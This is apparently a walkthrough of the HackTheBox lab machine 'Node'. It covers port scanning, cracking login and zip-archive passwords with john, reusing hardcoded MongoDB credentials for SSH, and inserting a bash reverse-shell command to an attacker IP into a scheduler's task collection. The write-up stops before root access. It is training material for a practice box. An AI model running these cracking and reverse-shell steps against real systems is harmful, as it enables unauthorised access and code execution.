HackTheBox-Node

node

NMAP

PORT     STATE SERVICE
22/tcp open ssh
3000/tcp open ppp

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 dc:5e:34:a6:25:db:43:ec:eb:40:f4:96:7b:8e:d1:da (RSA)
| 256 6c:8e:5e:5f:4f:d5:41:7d:18:95:d1:dc:2e:3f:e5:9c (ECDSA)
|_ 256 d8:78:b8:5d:85:ff:ad:7b:e6:e2:b5:da:1e:52:62:36 (ED25519)
3000/tcp open hadoop-tasktracker Apache Hadoop
| hadoop-datanode-info:
|_ Logs: /login
| hadoop-tasktracker-info:
|_ Logs: /login
|_http-title: MyPlace
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port 3000


Online password cracking

myP14ceAdm1nAcc0uNT:manchester

tom:spongebob

mark:snowflake

rastating:NO RESULT

Only myP14ceAdm1nAcc0uNT is an admin.

When I log in as myP14ceAdm1nAcc0uNT, I get this file.


Download it. Running cat on the download doesn't reveal much, but if you decode it with base64 -d into a file and then check the file type, it is a zip.

cat myplace.backup.gz|base64 -d > a
file a
a: Zip archive data, at least v1.0 to extract
mv a myplace.backup.zip

So it is a zip archive, but it is password protected. We can use zip2john to extract the password hash and pass it to john to crack it.

zip2john myplace.backup.zip >myplace.backup.zip.hash
john myplace.backup.zip.hash --wordlist=/opt/useful/Seclists/Passwords/Leaked-Databases/rockyou.txt

Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
magicword (myplace.backup.zip)
1g 0:00:00:00 DONE (2021-04-15 08:10) 33.33g/s 6280Kp/s 6280Kc/s 6280KC/s sandrad..becky101
Use the "--show" option to display all of the cracked passwords reliably
Session completed

After unpacking the archive, you can see the website's backup files.

└──╼ #cat app.js

const ......................
const url = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/myplace?authMechanism=DEFAULT&authSource=myplace';
const backup_key = '45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474';

The database is MongoDB, and the connection string at the top of app.js gives the user mark with password 5AYRft73VtFpc84k. We can try this password to log in over SSH.

Last login: Wed Sep 27 02:33:14 2017 from 10.10.14.3
mark@node:~$ id
uid=1001(mark) gid=1001(mark) groups=1001(mark)

After enumerating the system, we find two files: /usr/local/bin/backup and /var/scheduler/app.js.

/usr/local/bin/backup is executed when we visit http[:/]/node.htb/admin/backup.

The other file, /var/scheduler/app.js, was found with ps -ef and is run by the user tom. tom also belongs to the admin group, so I guess we need to become the tom user.

mark@node:/tmp$ cat /var/scheduler/app.js
const exec = require('child_process').exec;
const MongoClient = require('mongodb').MongoClient;
const ObjectID = require('mongodb').ObjectID;
const url = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/scheduler?authMechanism=DEFAULT&authSource=scheduler';

MongoClient.connect(url, function(error, db) {
  if (error || !db) {
    console.log('[!] Failed to connect to mongodb');
    return;
  }

  setInterval(function () {
    db.collection('tasks').find().toArray(function (error, docs) {
      if (!error && docs) {
        docs.forEach(function (doc) {
          if (doc) {
            console.log('Executing task ' + doc._id + '...');
            exec(doc.cmd);
            db.collection('tasks').deleteOne({ _id: new ObjectID(doc._id) });
          }
        });
      }
      else if (error) {
        console.log('Something went wrong: ' + error);
      }
    });
  }, 30000);

});

Looking at this file, it connects to the scheduler database and acts as a task scheduler: every 30 seconds it reads every document in the tasks collection, passes the cmd field straight to exec, and then deletes the document. Since mark's credentials work on this database too, anything written to the tasks collection gets executed as tom.

mongo --port 27017 -u "mark" -p "5AYRft73VtFpc84k"   "scheduler"

db.tasks.find()
#db.tasks.insert({cmd:"touch /tmp/test"}) test

db.tasks.insert({cmd:"bash -c 'bash -i >&/dev/tcp/10.10.16.69/1234 0>&1'"})


Privilege escalation to root

I don't know how to go further from here, so I'm leaving it for now and will try again later.